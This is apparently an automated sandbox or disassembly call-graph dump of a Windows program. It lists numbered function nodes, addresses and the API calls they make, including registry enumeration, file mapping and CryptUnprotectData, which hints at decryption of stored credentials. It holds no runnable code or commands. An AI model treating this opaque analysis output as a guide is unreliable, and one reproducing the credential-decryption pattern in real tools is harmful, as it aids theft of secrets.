39095->39098 39096->39093 39097->39085 39099 4096dc CreateFileW 39098->39099 39100 40e0f1 CreateFileMappingW 39099->39100 39101 40e140 CloseHandle CloseHandle 39100->39101 39102 40e10b MapViewOfFile 39100->39102 39101->39092 39103 40e13b CloseHandle 39102->39103 39104 40e11f WriteFile UnmapViewOfFile 39102->39104 39103->39101 39104->39103 39106 40e18c 39105->39106 39107 406b90 11 API calls 39106->39107 39108 40e19f 39107->39108 39109 40e1a7 memset 39108->39109 39110 40e299 39108->39110 39116 40e1e8 39109->39116 39111 4069a3 ??3@YAXPAX free 39110->39111 39112 40e2a4 39111->39112 39112->39081 39113 406e8f 13 API calls 39113->39116 39114 406b53 SetFilePointerEx ReadFile 39114->39116 39115 40dd50 _wcsicmp 39115->39116 39116->39113 39116->39114 39116->39115 39117 40e283 39116->39117 39121 40742e 8 API calls 39116->39121 39122 40aae3 wcslen wcslen _memicmp 39116->39122 39123 40e244 _snwprintf 39116->39123 39118 40e291 39117->39118 39119 40e288 free 39117->39119 39120 40aa04 free 39118->39120 39119->39118 39120->39110 39121->39116 39122->39116 39124 40a8d0 7 API calls 39123->39124 39124->39116 39125->39081 39126->39063 39129 40a980 39127->39129 39128 40a8bb 39128->39002 39128->39003 39129->39128 39130 40a995 _wcsicmp 39129->39130 39131 40a99c wcscmp 39129->39131 39130->39129 39131->39129 39132->39006 39133->39010 39135 40aa23 RegEnumValueW 39134->39135 39135->39017 39135->39018 39137 40522a 39136->39137 39162 405329 39136->39162 39138 40b2cc 27 API calls 39137->39138 39139 405234 39138->39139 39140 40a804 8 API calls 39139->39140 39141 40523a 39140->39141 39163 40b273 39141->39163 39143 405248 _mbscpy _mbscat 39144 40526c 39143->39144 39145 40b273 27 API calls 39144->39145 39146 405279 39145->39146 39147 40b273 27 API calls 39146->39147 39148 40528f 39147->39148 39149 40b273 27 API calls 39148->39149 39150 4052a5 39149->39150 39151 40b273 27 API calls 39150->39151 39152 4052bb 39151->39152 39153 40b273 27 API calls 39152->39153 39154 4052d1 39153->39154 39155 40b273 27 API calls 39154->39155 39156 4052e7 39155->39156 39157 40b273 27 API calls 39156->39157 39158 4052fd 39157->39158 39159 40b273 27 API calls 39158->39159 39160 405313 39159->39160 39161 40b273 27 API calls 39160->39161 39161->39162 39162->39028 39164 40b58d 27 API calls 39163->39164 39165 40b18c 39164->39165 39165->39143 39167 40440c FreeLibrary 39166->39167 39168 40436d 39167->39168 39169 40a804 8 API calls 39168->39169 39170 404377 39169->39170 39171 4043f7 39170->39171 39172 40b273 27 API calls 39170->39172 39171->38610 39171->38612 39173 40438d 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043a7 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043ba 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4043ce 39178->39179 39180 40b273 27 API calls 39179->39180 39181 4043e2 39180->39181 39181->39171 39182 40440c FreeLibrary 39181->39182 39182->39171 39184 404413 FreeLibrary 39183->39184 39185 40441e 39183->39185 39184->39185 39185->38623 39186->38620 39188 40447e 39187->39188 39189 40442e 39187->39189 39190 404485 CryptUnprotectData 39188->39190 39191 40449c 39188->39191 39192 40b2cc 27 API calls 39189->39192 39190->39191 39191->38620 39193 404438 39192->39193 39194 40a804 8 API calls 39193->39194 39195 40443e 39194->39195 39196 40444f 39195->39196 39197 40b273 27 API calls 39195->39197 39196->39188 39198 404475 FreeLibrary 39196->39198 39197->39196 39198->39188 39200 4135f6 39199->39200 39201 4135eb FreeLibrary 39199->39201 39200->38626 39201->39200 39203 4449c4 39202->39203 39221 444a48 39202->39221 39204 40b2cc 27 API calls 39203->39204 39205 4449cb 39204->39205 39206 40a804 8 API calls 39205->39206 39207 4449d1 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449dc 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4449f3 39210->39211 39221->38646 39221->38647 39222->38652 39223->38652 39224->38652 39225->38652 39226->38648 39228 403a29 39227->39228 39242 403bed memset memset 39228->39242 39230 403ae7 39255 40b1ab free free 39230->39255 39231 403a3f memset 39235 403a2f 39231->39235 39233 403aef 39233->38665 39234 409d1f 6 API calls 39234->39235 39235->39230 39235->39231 39235->39234 39236 409b98 GetFileAttributesW 39235->39236 39237 40a8d0 7 API calls 39235->39237 39236->39235 39237->39235 39239 40a051 GetFileTime CloseHandle 39238->39239 39240 4039ca CompareFileTime 39238->39240 39239->39240 39240->38665 39241->38664 39243 414c2e 16 API calls 39242->39243 39244 403c38 39243->39244 39245 409719 2 API calls 39244->39245 39246 403c3f wcscat 39245->39246 39247 414c2e 16 API calls 39246->39247 39248 403c61 39247->39248 39249 409719 2 API calls 39248->39249 39250 403c68 wcscat 39249->39250 39256 403af5 39250->39256 39253 403af5 20 API calls 39254 403c95 39253->39254 39254->39235 39255->39233 39257 403b02 39256->39257 39258 40ae18 9 API calls 39257->39258 39267 403b37 39258->39267 39259 403bdb 39261 40aebe FindClose 39259->39261 39260 40add4 wcscmp wcscmp 39260->39267 39262 403be6 39261->39262 39262->39253 39263 40a8d0 7 API calls 39263->39267 39264 40ae18 9 API calls 39264->39267 39265 40ae51 9 API calls 39265->39267 39266 40aebe FindClose 39266->39267 39267->39259 39267->39260 39267->39263 39267->39264 39267->39265 39267->39266 39269 409d1f 6 API calls 39268->39269 39270 404190 39269->39270 39283 409b98 GetFileAttributesW 39270->39283 39272 40419c 39273 4041a7 6 API calls 39272->39273 39274 40435c 39272->39274 39275 40424f 39273->39275 39274->38691 39275->39274 39277 40425e memset 39275->39277 39279 409d1f 6 API calls 39275->39279 39280 40a8ab 9 API calls 39275->39280 39284 414842 39275->39284 39277->39275 39278 404296 wcscpy 39277->39278 39278->39275 39279->39275 39281 4042b6 memset memset _snwprintf wcscpy 39280->39281 39281->39275 39282->38689 39283->39272 39287 41443e 39284->39287 39286 414866 39286->39275 39288 41444b 39287->39288 39289 414451 39288->39289 39290 4144a3 GetPrivateProfileStringW 39288->39290 39291 414491 39289->39291 39292 414455 wcschr 39289->39292 39290->39286 39294 414495 WritePrivateProfileStringW 39291->39294 39292->39291 39293 414463 _snwprintf 39292->39293 39293->39294 39294->39286 39295->38695 39297 40b2cc 27 API calls 39296->39297 39298 409615 39297->39298 39299 409d1f 6 API calls 39298->39299 39300 409625 39299->39300 39323 409b98 GetFileAttributesW 39300->39323 39302 409634 39303 409648 39302->39303 39340 4091b8 238 API calls 39302->39340 39305 40b2cc 27 API calls 39303->39305 39307 408801 39303->39307 39306 40965d 39305->39306 39308 409d1f 6 API calls 39306->39308 39307->38698 39307->38730 39309 40966d 39308->39309 39324 409b98 GetFileAttributesW 39309->39324 39311 40967c 39311->39307 39325 409529 39311->39325 39323->39302 39324->39311 39341 4096c3 CreateFileW 39325->39341 39327 409543 39328 4095cd 39327->39328 39329 409550 GetFileSize 39327->39329 39328->39307 39330 409577 CloseHandle 39329->39330 39331 40955f 39329->39331 39330->39328 39336 409585 39330->39336 39332 40afcf 2 API calls 39331->39332 39333 409569 39332->39333 39342 40a2ef ReadFile 39333->39342 39335 409574 39335->39330 39336->39328 39337 4095c3 39336->39337 39343 408b8d 38 API calls 39336->39343 39344 40908b 55 API calls 39337->39344 39340->39303 39341->39327 39342->39335 39343->39336 39344->39328 39372 413f4f 39345->39372 39348 413f37 K32GetModuleFileNameExW 39349 413f4a 39348->39349 39349->38759 39351 413969 wcscpy 39350->39351 39352 41396c wcschr 39350->39352 39364 413a3a 39351->39364 39352->39351 39354 41398e 39352->39354 39376 4097f7 wcslen wcslen _memicmp 39354->39376 39356 41399a 39357 4139a4 memset 39356->39357 39358 4139e6 39356->39358 39377 409dd5 GetWindowsDirectoryW wcscpy 39357->39377 39360 413a31 wcscpy 39358->39360 39361 4139ec memset 39358->39361 39360->39364 39378 409dd5 GetWindowsDirectoryW wcscpy 39361->39378 39362 4139c9 wcscpy wcscat 39362->39364 39364->38759 39365 413a11 memcpy wcscat 39365->39364 39367 413cb0 GetModuleHandleW 39366->39367 39368 413cda 39366->39368 39367->39368 39369 413cbf 39367->39369 39370 413ce3 GetProcessTimes 39368->39370 39371 413cf6 39368->39371 39369->39368 39370->38761 39371->38761 39373 413f54 39372->39373 39375 413f2f 39372->39375 39374 40a804 8 API calls 39373->39374 39374->39375 39375->39348 39375->39349 39376->39356 39377->39362 39378->39365 39379->38781 39380->38804 39382 409cf9 GetVersionExW 39381->39382 39383 409d0a 39381->39383 39382->39383 39383->38811 39383->38815 39384->38818 39385->38821 39386->38823 39387->38868 39389 40bba5 39388->39389 39523 40cc26 39389->39523 39392 40bd4b 39544 40cc0c 39392->39544 39397 40b2cc 27 API calls 39398 40bbef 39397->39398 39551 40ccf0 _wcsicmp 39398->39551 39400 40bbf5 39400->39392 39552 40ccb4 6 API calls 39400->39552 39402 40bc26 39403 40cf04 17 API calls 39402->39403 39404 40bc2e 39403->39404 39405 40bd43 39404->39405 39406 40b2cc 27 API calls 39404->39406 39407 40cc0c 4 API calls 39405->39407 39408 40bc40 39406->39408 39407->39392 39553 40ccf0 _wcsicmp 39408->39553 39410 40bc46 39410->39405 39411 40bc61 memset memset WideCharToMultiByte 39410->39411 39554 40103c strlen 39411->39554 39413 40bcc0 39414 40b273 27 API calls 39413->39414 39415 40bcd0 memcmp 39414->39415 39415->39405 39416 40bce2 39415->39416 39417 404423 37 API calls 39416->39417 39418 40bd10 39417->39418 39418->39405 39419 40bd3a LocalFree 39418->39419 39420 40bd1f memcpy 39418->39420 39419->39405 39420->39419 39421->38883 39614 4438b5 39422->39614 39424 44444c 39425 40b879 39424->39425 39628 415a6d 39424->39628 39425->38886 39425->38887 39427 4442e6 11 API calls 39429 44469e 39427->39429 39428 444486 39430 4444b9 memcpy 39428->39430 39467 4444a4 39428->39467 39429->39425 39432 443d90 110 API calls 39429->39432 39632 415258 39430->39632 39432->39425 39433 444524 39434 444541 39433->39434 39435 44452a 39433->39435 39635 444316 39434->39635 39436 416935 16 API calls 39435->39436 39436->39467 39439 444316 18 API calls 39440 444563 39439->39440 39441 444316 18 API calls 39440->39441 39442 44456f 39441->39442 39443 444316 18 API calls 39442->39443 39444 44457f 39443->39444 39444->39467 39649 432d4e 39444->39649 39447 444316 18 API calls 39448 4445b0 39447->39448 39653 41eed2 39448->39653 39450 4445cf 39451 4445d6 39450->39451 39452 4445ee 39450->39452 39455 416935 16 API calls 39451->39455 39669 43302c 39452->39669 39455->39467 39456 43302c memset 39457 444609 39456->39457 39457->39467 39675 416935 39457->39675 39467->39427 39747 438460 39468->39747 39470 40b8a4 39470->38893 39494 4251c4 39470->39494 39472 443da3 39471->39472 39490 443db6 39471->39490 39835 41707a 11 API calls 39472->39835 39474 443da8 39475 443dbc 39474->39475 39476 443dac 39474->39476 39837 4300e8 memset memset memcpy 39475->39837 39836 4446ea 11 API calls 39476->39836 39479 443de0 39480 416935 16 API calls 39479->39480 39480->39490 39481 443dce 39481->39479 39485 443e22 39481->39485 39482 443e5a 39839 4300e8 memset memset memcpy 39482->39839 39485->39482 39838 41f0ac 102 API calls 39485->39838 39486 443e63 39487 416935 16 API calls 39486->39487 39488 443f3b 39487->39488 39488->39490 39840 42320f memset memcpy 39488->39840 39490->38886 39492 409a74 GetTempFileNameW 39491->39492 39493 409a66 GetWindowsDirectoryW 39491->39493 39492->38880 39493->39492 39841 424f07 11 API calls 39494->39841 39496 4251e4 39497 4251f7 39496->39497 39498 4251e8 39496->39498 39843 4250f8 39497->39843 39842 4446ea 11 API calls 39498->39842 39500 4251f2 39500->38918 39502 425209 39504 425249 39502->39504 39508 4250f8 126 API calls 39502->39508 39509 425287 39502->39509 39851 4384e9 134 API calls 39502->39851 39852 424f74 123 API calls 39502->39852 39503 415c7d 16 API calls 39503->39500 39504->39509 39853 424ff0 13 API calls 39504->39853 39508->39502 39509->39503 39510 425266 39510->39509 39854 415be9 memcpy 39510->39854 39512->38918 39513->38918 39514->38918 39515->38918 39516->38918 39517->38918 39518->38918 39519->38918 39520->38918 39521->38893 39522->38915 39555 4096c3 CreateFileW 39523->39555 39525 40cc34 39526 40cc3d GetFileSize 39525->39526 39527 40bbca 39525->39527 39528 40afcf 2 API calls 39526->39528 39527->39392 39535 40cf04 39527->39535 39529 40cc64 39528->39529 39556 40a2ef ReadFile 39529->39556 39531 40cc71 39557 40ab4a MultiByteToWideChar 39531->39557 39533 40cc95 CloseHandle 39534 40b04b ??3@YAXPAX 39533->39534 39534->39527 39536 40b633 free 39535->39536 39537 40cf14 39536->39537 39563 40b1ab free free 39537->39563 39539 40bbdd 39539->39392 39539->39397 39540 40cf1b 39540->39539 39542 40cfef 39540->39542 39564 40cd4b 39540->39564 39543 40cd4b 14 API calls 39542->39543 39543->39539 39545 40b633 free 39544->39545 39546 40cc15 39545->39546 39547 40aa04 free 39546->39547 39548 40cc1d 39547->39548 39613 40b1ab free free 39548->39613 39550 40b7d4 memset CreateFileW 39550->38873 39550->38874 39551->39400 39552->39402 39553->39410 39554->39413 39555->39525 39556->39531 39558 40ab93 39557->39558 39559 40ab6b 39557->39559 39558->39533 39560 40a9ce 4 API calls 39559->39560 39561 40ab74 39560->39561 39562 40ab7c MultiByteToWideChar 39561->39562 39562->39558 39563->39540 39565 40cd7b 39564->39565 39598 40aa29 39565->39598 39567 40cef5 39568 40aa04 free 39567->39568 39569 40cefd 39568->39569 39569->39540 39571 40aa29 6 API calls 39572 40ce1d 39571->39572 39573 40aa29 6 API calls 39572->39573 39574 40ce3e 39573->39574 39575 40ce6a 39574->39575 39606 40abb7 wcslen memmove 39574->39606 39576 40ce9f 39575->39576 39609 40abb7 wcslen memmove 39575->39609 39579 40a8d0 7 API calls 39576->39579 39582 40ceb5 39579->39582 39580 40ce56 39607 40aa71 wcslen 39580->39607 39581 40ce8b 39610 40aa71 wcslen 39581->39610 39588 40a8d0 7 API calls 39582->39588 39585 40ce5e 39608 40abb7 wcslen memmove 39585->39608 39586 40ce93 39611 40abb7 wcslen memmove 39586->39611 39590 40cecb 39588->39590 39612 40d00b malloc memcpy free free 39590->39612 39592 40cedd 39593 40aa04 free 39592->39593 39594 40cee5 39593->39594 39595 40aa04 free 39594->39595 39596 40ceed 39595->39596 39597 40aa04 free 39596->39597 39597->39567 39599 40aa33 39598->39599 39605 40aa63 39598->39605 39600 40aa44 39599->39600 39601 40aa38 wcslen 39599->39601 39602 40a9ce malloc memcpy free free 39600->39602 39601->39600 39603 40aa4d 39602->39603 39604 40aa51 memcpy 39603->39604 39603->39605 39604->39605 39605->39567 39605->39571 39606->39580 39607->39585 39608->39575 39609->39581 39610->39586 39611->39576 39612->39592 39613->39550 39615 4438d0 39614->39615 39625 4438c9 39614->39625 39702 415378 memcpy memcpy 39615->39702 39625->39424 39629 415a77 39628->39629 39630 415a8d 39629->39630 39631 415a7e memset 39629->39631 39630->39428 39631->39630 39633 4438b5 11 API calls 39632->39633 39634 41525d 39633->39634 39634->39433 39636 444328 39635->39636 39637 444423 39636->39637 39638 44434e 39636->39638 39703 4446ea 11 API calls 39637->39703 39639 432d4e 3 API calls 39638->39639 39641 44435a 39639->39641 39643 444375 39641->39643 39648 44438b 39641->39648 39642 432d4e 3 API calls 39644 4443ec 39642->39644 39645 416935 16 API calls 39643->39645 39646 444381 39644->39646 39647 416935 16 API calls 39644->39647 39645->39646 39646->39439 39647->39646 39648->39642 39650 432d65 39649->39650 39651 432d58 39649->39651 39650->39447 39704 432cc4 memset memset memcpy 39651->39704 39654 41eee2 39653->39654 39655 415a6d memset 39654->39655 39656 41ef23 39655->39656 39657 415a6d memset 39656->39657 39668 41ef2d 39656->39668 39658 41ef42 39657->39658 39662 41ef49 39658->39662 39705 41b7d9 39658->39705 39660 41ef66 39661 41ef74 memset 39660->39661 39660->39662 39663 41ef91 39661->39663 39666 41ef9e 39661->39666 39662->39668 39720 41b321 100 API calls 39662->39720 39665 41519d 6 API calls 39663->39665 39665->39666 39666->39662 39719 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39666->39719 39668->39450 39670 433033 39669->39670 39671 433042 39669->39671 39726 421f20 memset 39670->39726 39727 415a91 39671->39727 39674 43303f 39674->39456 39703->39646 39704->39650 39711 41b812 39705->39711 39706 415a6d memset 39707 41b8c2 39706->39707 39708 41b980 39707->39708 39709 41b902 memcpy memcpy memcpy memcpy memcpy 39707->39709 39714 41b849 39707->39714 39716 41b9ad 39708->39716 39722 4151e3 39708->39722 39709->39708 39711->39714 39718 41b884 39711->39718 39721 444706 11 API calls 39711->39721 39714->39660 39716->39714 39725 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39716->39725 39718->39706 39718->39714 39719->39662 39720->39668 39721->39718 39724 41837f 54 API calls 39722->39724 39726->39674 39728 415a9d 39727->39728 39729 415ab3 39728->39729 39730 415aa4 memset 39728->39730 39729->39674 39730->39729 39759 41703f 39747->39759 39749 43847a 39750 43848a 39749->39750 39751 43847e 39749->39751 39766 438270 39750->39766 39796 4446ea 11 API calls 39751->39796 39756 4384bb 39757 438270 133 API calls 39756->39757 39758 438488 39757->39758 39758->39470 39760 417044 39759->39760 39761 41705c 39759->39761 39765 417055 39760->39765 39798 416760 11 API calls 39760->39798 39762 417075 39761->39762 39799 41707a 11 API calls 39761->39799 39762->39749 39765->39749 39767 415a91 memset 39766->39767 39768 43828d 39767->39768 39769 438297 39768->39769 39770 438341 39768->39770 39772 4382d6 39768->39772 39771 415c7d 16 API calls 39769->39771 39800 44358f 39770->39800 39774 438458 39771->39774 39775 4382fb 39772->39775 39776 4382db 39772->39776 39774->39758 39797 424f26 122 API calls 39774->39797 39831 415c23 memcpy 39775->39831 39777 416935 16 API calls 39776->39777 39779 4382e9 39777->39779 39781 415c7d 16 API calls 39779->39781 39780 438305 39783 44358f 19 API calls 39780->39783 39786 438318 39780->39786 39781->39769 39782 438373 39785 438383 39782->39785 39832 4300e8 memset memset memcpy 39782->39832 39783->39786 39789 4383cd 39785->39789 39833 415c23 memcpy 39785->39833 39786->39782 39826 43819e 39786->39826 39788 4383f5 39792 438404 39788->39792 39793 43841c 39788->39793 39789->39788 39834 42453e 122 API calls 39789->39834 39795 416935 16 API calls 39792->39795 39794 416935 16 API calls 39793->39794 39794->39769 39795->39769 39796->39758 39797->39756 39798->39765 39799->39760 39801 4435be 39800->39801 39803 443676 39801->39803 39806 4436ce 39801->39806 39809 442ff8 19 API calls 39801->39809 39810 44366c 39801->39810 39824 44360c 39801->39824 39802 443758 39805 441409 memset 39802->39805 39814 443775 39802->39814 39803->39802 39804 443737 39803->39804 39807 442ff8 19 API calls 39803->39807 39808 442ff8 19 API calls 39804->39808 39805->39802 39812 4165ff 11 API calls 39806->39812 39807->39804 39808->39802 39809->39801 39813 4169a7 11 API calls 39810->39813 39811 4437be 39815 416760 11 API calls 39811->39815 39816 4437de 39811->39816 39812->39803 39813->39803 39814->39811 39820 415c56 11 API calls 39814->39820 39815->39816 39817 42463b memset memcpy 39816->39817 39819 443801 39816->39819 39817->39819 39818 443826 39822 43bd08 memset 39818->39822 39819->39818 39821 43024d memset 39819->39821 39820->39811 39821->39818 39823 443837 39822->39823 39823->39824 39825 43024d memset 39823->39825 39824->39786 39825->39823 39827 438246 39826->39827 39829 4381ba 39826->39829 39827->39782 39828 41f432 109 API calls 39828->39829 39829->39827 39829->39828 39830 41f638 103 API calls 39829->39830 39830->39829 39831->39780 39832->39785 39833->39789 39834->39788 39835->39474 39836->39490 39837->39481 39838->39485 39839->39486 39840->39490 39841->39496 39842->39500 39844 425108 39843->39844 39850 42510d 39843->39850 39887 424f74 123 API calls 39844->39887 39847 42516e 39849 415c7d 16 API calls 39847->39849 39848 425115 39848->39502 39849->39848 39850->39848 39855 42569b 39850->39855 39851->39502 39852->39502 39853->39510 39854->39509 39865 4256f1 39855->39865 39883 4259c2 39855->39883 39860 4260dd 39899 424251 119 API calls 39860->39899 39861 429a4d 39868 429a66 39861->39868 39869 429a9b 39861->39869 39865->39861 39866 422aeb memset memcpy memcpy 39865->39866 39871 4260a1 39865->39871 39880 4259da 39865->39880 39881 429ac1 39865->39881 39865->39883 39886 425a38 39865->39886 39888 4227f0 memset memcpy 39865->39888 39889 422b84 15 API calls 39865->39889 39890 422b5d memset memcpy memcpy 39865->39890 39891 422640 13 API calls 39865->39891 39893 4241fc 11 API calls 39865->39893 39894 42413a 89 API calls 39865->39894 39866->39865 39900 415c56 11 API calls 39868->39900 39870 429a96 39869->39870 39902 416760 11 API calls 39869->39902 39903 424251 119 API calls 39870->39903 39897 415c56 11 API calls 39871->39897 39873 429a7a 39901 416760 11 API calls 39873->39901 39898 416760 11 API calls 39880->39898 39882 425ad6 39881->39882 39904 415c56 11 API calls 39881->39904 39882->39847 39883->39882 39892 415c56 11 API calls 39883->39892 39886->39883 39895 422640 13 API calls 39886->39895 39896 4226e0 12 API calls 39886->39896 39887->39850 39888->39865 39889->39865 39890->39865 39891->39865 39892->39880 39893->39865 39894->39865 39895->39886 39896->39886 39897->39880 39898->39860 39899->39882 39900->39873 39901->39870 39902->39870 39903->39881 39904->39880 39905->38953 39906->38961 39916 44def7 39917 44df07 39916->39917 39918 44df00 ??3@YAXPAX 39916->39918 39919 44df17 39917->39919 39920 44df10 ??3@YAXPAX 39917->39920 39918->39917 39921 44df27 39919->39921 39922 44df20 ??3@YAXPAX 39919->39922 39920->39919 39923 44df37 39921->39923 39924 44df30 ??3@YAXPAX 39921->39924 39922->39921 39924->39923 37718 44dea5 37719 44deb5 FreeLibrary 37718->37719 37720 44dec3 37718->37720 37719->37720 39925 4148b6 FindResourceW 39926 4148f9 39925->39926 39927 4148cf SizeofResource 39925->39927 39927->39926 39928 4148e0 LoadResource 39927->39928 39928->39926 39929 4148ee LockResource 39928->39929 39929->39926 37897 415304 free 39930 441b3f 39940 43a9f6 39930->39940 39932 441b61 40113 4386af memset 39932->40113 39934 44189a 39935 4418e2 39934->39935 39937 442bd4 39934->39937 39936 4418ea 39935->39936 40114 4414a9 12 API calls 39935->40114 39937->39936 40115 441409 memset 39937->40115 39941 43aa20 39940->39941 39948 43aadf 39940->39948 39942 43aa34 memset 39941->39942 39941->39948 39943 43aa56 39942->39943 39944 43aa4d 39942->39944 40116 43a6e7 39943->40116 40124 42c02e memset 39944->40124 39948->39932 39950 43aad3 40126 4169a7 11 API calls 39950->40126 39951 43aaae 39951->39948 39951->39950 39966 43aae5 39951->39966 39952 43ac18 39955 43ac47 39952->39955 40128 42bbd5 memcpy memcpy memcpy memset memcpy 39952->40128 39956 43aca8 39955->39956 40129 438eed 16 API calls 39955->40129 39960 43acd5 39956->39960 40131 4233ae 11 API calls 39956->40131 39959 43ac87 40130 4233c5 16 API calls 39959->40130 40132 423426 11 API calls 39960->40132 39964 43ace1 40133 439811 162 API calls 39964->40133 39965 43a9f6 160 API calls 39965->39966 39966->39948 39966->39952 39966->39965 40127 439bbb 22 API calls 39966->40127 39968 43acfd 39973 43ad2c 39968->39973 40134 438eed 16 API calls 39968->40134 39970 43ad19 40135 4233c5 16 API calls 39970->40135 39972 43ad58 40136 44081d 162 API calls 39972->40136 39973->39972 39976 43add9 39973->39976 39976->39976 40140 423426 11 API calls 39976->40140 39977 43ae3a memset 39978 43ae73 39977->39978 40141 42e1c0 146 API calls 39978->40141 39979 43adab 40138 438c4e 162 API calls 39979->40138 39980 43ad6c 39980->39948 39980->39979 40137 42370b memset memcpy memset 39980->40137 39984 43adcc 40139 440f84 12 API calls 39984->40139 39985 43ae96 40142 42e1c0 146 API calls 39985->40142 39988 43aea8 39991 43aec1 39988->39991 40143 42e199 146 API calls 39988->40143 39990 43af00 39990->39948 39995 43af1a 39990->39995 39996 43b3d9 39990->39996 39991->39990 40144 42e1c0 146 API calls 39991->40144 39992 43add4 39997 43b60f 39992->39997 40203 438f86 16 API calls 39992->40203 40145 438eed 16 API calls 39995->40145 40001 43b3f6 39996->40001 40006 43b4c8 39996->40006 39997->39948 40204 4393a5 17 API calls 39997->40204 40000 43af2f 40146 4233c5 16 API calls 40000->40146 40186 432878 12 API calls 40001->40186 40003 43af51 40147 423426 11 API calls 40003->40147 40005 43b4f2 40193 43a76c 21 API calls 40005->40193 40006->40005 40192 42bbd5 memcpy memcpy memcpy memset memcpy 40006->40192 40008 43af7d 40148 423426 11 API calls 40008->40148 40012 43af94 40149 423330 11 API calls 40012->40149 40013 43b529 40194 44081d 162 API calls 40013->40194 40014 43b462 40188 423330 11 API calls 40014->40188 40018 43b544 40022 43b55c 40018->40022 40195 42c02e memset 40018->40195 40019 43b428 40019->40014 40187 432b60 16 API calls 40019->40187 40020 43afca 40150 423330 11 API calls 40020->40150 40021 43b47e 40024 43b497 40021->40024 40189 42374a memcpy memset memcpy memcpy memcpy 40021->40189 40196 43a87a 162 API calls 40022->40196 40190 4233ae 11 API calls 40024->40190 40027 43afdb 40151 4233ae 11 API calls 40027->40151 40030 43b4b1 40191 423399 11 API calls 40030->40191 40032 43b56c 40035 43b58a 40032->40035 40197 423330 11 API calls 40032->40197 40034 43afee 40152 44081d 162 API calls 40034->40152 40198 440f84 12 API calls 40035->40198 40036 43b4c1 40200 42db80 162 API calls 40036->40200 40041 43b592 40199 43a82f 16 API calls 40041->40199 40044 43b5b4 40201 438c4e 162 API calls 40044->40201 40046 43b5cf 40202 42c02e memset 40046->40202 40048 43b005 40048->39948 40053 43b01f 40048->40053 40153 42d836 162 API calls 40048->40153 40049 43b1ef 40163 4233c5 16 API calls 40049->40163 40051 43b212 40164 423330 11 API calls 40051->40164 40053->40049 40161 423330 11 API calls 40053->40161 40162 42d71d 162 API calls 40053->40162 40055 43b087 40154 4233ae 11 API calls 40055->40154 40058 43b22a 40165 42ccb5 11 API calls 40058->40165 40061 43b23f 40166 4233ae 11 API calls 40061->40166 40062 43b10f 40157 423330 11 API calls 40062->40157 40064 43b257 40167 4233ae 11 API calls 40064->40167 40068 43b129 40158 4233ae 11 API calls 40068->40158 40069 43b26e 40168 4233ae 11 API calls 40069->40168 40072 43b09a 40072->40062 40155 42cc15 19 API calls 40072->40155 40156 4233ae 11 API calls 40072->40156 40074 43b282 40169 43a87a 162 API calls 40074->40169 40075 43b13c 40159 440f84 12 API calls 40075->40159 40077 43b29d 40170 423330 11 API calls 40077->40170 40080 43b15f 40160 4233ae 11 API calls 40080->40160 40081 43b2af 40083 43b2b8 40081->40083 40084 43b2ce 40081->40084 40171 4233ae 11 API calls 40083->40171 40172 440f84 12 API calls 40084->40172 40087 43b2c9 40174 4233ae 11 API calls 40087->40174 40088 43b2da 40173 42370b memset memcpy memset 40088->40173 40091 43b2f9 40175 423330 11 API calls 40091->40175 40093 43b30b 40176 423330 11 API calls 40093->40176 40095 43b325 40177 423399 11 API calls 40095->40177 40097 43b332 40178 4233ae 11 API calls 40097->40178 40099 43b354 40179 423399 11 API calls 40099->40179 40101 43b364 40180 43a82f 16 API calls 40101->40180 40103 43b370 40181 42db80 162 API calls 40103->40181 40105 43b380 40182 438c4e 162 API calls 40105->40182 40107 43b39e 40183 423399 11 API calls 40107->40183 40109 43b3ae 40184 43a76c 21 API calls 40109->40184 40111 43b3c3 40185 423399 11 API calls 40111->40185 40113->39934 40114->39936 40115->39937 40117 43a6f5 40116->40117 40118 43a765 40116->40118 40117->40118 40205 42a115 40117->40205 40118->39948 40125 4397fd memset 40118->40125 40122 43a73d 40122->40118 40123 42a115 146 API calls 40122->40123 40123->40118 40124->39943 40125->39951 40126->39948 40127->39966 40128->39955 40129->39959 40130->39956 40131->39960 40132->39964 40133->39968 40134->39970 40135->39973 40136->39980 40137->39979 40138->39984 40139->39992 40140->39977 40141->39985 40142->39988 40143->39991 40144->39991 40145->40000 40146->40003 40147->40008 40148->40012 40149->40020 40150->40027 40151->40034 40152->40048 40153->40055 40154->40072 40155->40072 40156->40072 40157->40068 40158->40075 40159->40080 40160->40053 40161->40053 40162->40053 40163->40051 40164->40058 40165->40061 40166->40064 40167->40069 40168->40074 40169->40077 40170->40081 40171->40087 40172->40088 40173->40087 40174->40091 40175->40093 40176->40095 40177->40097 40178->40099 40179->40101 40180->40103 40181->40105 40182->40107 40183->40109 40184->40111 40185->39992 40186->40019 40187->40014 40188->40021 40189->40024 40190->40030 40191->40036 40192->40005 40193->40013 40194->40018 40195->40022 40196->40032 40197->40035 40198->40041 40199->40036 40200->40044 40201->40046 40202->39992 40203->39997 40204->39948 40206 42a175 40205->40206 40208 42a122 40205->40208 40206->40118 40211 42b13b 146 API calls 40206->40211 40208->40206 40209 42a115 146 API calls 40208->40209 40212 43a174 40208->40212 40236 42a0a8 146 API calls 40208->40236 40209->40208 40211->40122 40226 43a196 40212->40226 40227 43a19e 40212->40227 40213 43a306 40213->40226 40250 4388c4 14 API calls 40213->40250 40216 42a115 146 API calls 40216->40227 40217 415a91 memset 40217->40227 40218 43a642 40218->40226 40255 4169a7 11 API calls 40218->40255 40222 43a635 40254 42c02e memset 40222->40254 40226->40208 40227->40213 40227->40216 40227->40217 40227->40226 40237 42ff8c 40227->40237 40245 4165ff 11 API calls 40227->40245 40246 439504 13 API calls 40227->40246 40247 4312d0 146 API calls 40227->40247 40248 42be4c memcpy memcpy memcpy memset memcpy 40227->40248 40249 43a121 11 API calls 40227->40249 40228 43a325 40228->40218 40228->40222 40228->40226 40230 42bf4c 14 API calls 40228->40230 40231 4169a7 11 API calls 40228->40231 40232 42b5b5 memset memcpy 40228->40232 40251 42b63e 14 API calls 40228->40251 40252 4165ff 11 API calls 40228->40252 40253 42bfcf memcpy 40228->40253 40230->40228 40231->40228 40232->40228 40236->40208 40256 43817e 40237->40256 40239 42ff99 40240 42ffe3 40239->40240 40241 42ffd0 40239->40241 40244 42ff9d 40239->40244 40261 4169a7 11 API calls 40240->40261 40260 4169a7 11 API calls 40241->40260 